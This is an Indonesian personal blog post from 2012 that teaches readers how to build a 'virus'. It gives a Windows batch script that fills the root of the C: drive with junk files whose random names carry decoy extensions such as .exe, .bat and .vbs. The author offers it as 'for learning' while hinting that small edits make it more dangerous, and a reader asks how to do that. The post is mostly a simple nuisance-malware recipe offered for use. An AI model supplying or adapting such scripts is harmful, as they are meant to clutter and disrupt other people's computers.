*SELAMAT DATANG DI BLOGKU KREASI ANAK KERINCI BERBAGI ILMU PENGALAMAN*

Senin, 26 November 2012

VIRUS WORM low Level

Lama gak posting nih,, kangen juga rasanya.,klo gak nulis-nulis dan berbagi pada orang-orang yang suka dengan perubahan, Rasanya tangan gue nih gatel bnget mau nulis ..heee

mungkin karena kesibukan gue kali ya,, rasanya dah hampir 2 bulanan ya.,
hhmmm,, apa ya yang ingin gue tulis kali ini., mungkin sedikit sharing ja buat teman-teman sahabat Blogger. Kali ini gue akan posting tentang cara buat Virus,, eeeettttssss jangan salah., virus ini bukan untuk merugikan orang ya., tapi hanya untuk belajar doang.,, janji ya jangan merugikan orang lain, karena rasanya gak enak klo di rugikan,, tetapi klo nyenangin orang lain ASYIK ya., hahha.,

waduh kyaknya terlalu lebar nih omongan gue,, nih gue kasih caranya..,tapi Virus ini Low level., tapi cuma edit kodenya sedikit virus ini bisa jadi high level lho., AWAS BAHAYA !!!

1. buka notped di komputermu.,
2. kopas kode di bawah ini.
3. SAVE as dengan format.bat (contoh : Virusku.bat)

KODE:

__---Virus name Nama_Virus Created By Nama_kamu---__::
@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Install.exe"
echo %random% > "C:\%random%Files.txt"
echo %random% > "C:\%random%No virus.bat"
echo %random% > "C:\%random%Files.jpg"
echo %random% > "C:\%random%Music.mp3"
echo %random% > "C:\%random%Files.vbs"
echo %random% > "C:\%random%Image.gif"
echo %random% > "C:\%random%Icon.ico"
echo %random% > "C:\%random%Windows.exe"
echo %random% > "C:\%random%My Video.3gp"
::---------------------------::

3 komentar:

Bagus mengatakan...

Bgus ni sob untuk di coba., hhee

Lia mengatakan...

Klo buat high level kode apanya yang di ubah.,

Aris mengatakan...

Virus apan nih.,,,,,,,,,,aagagarrr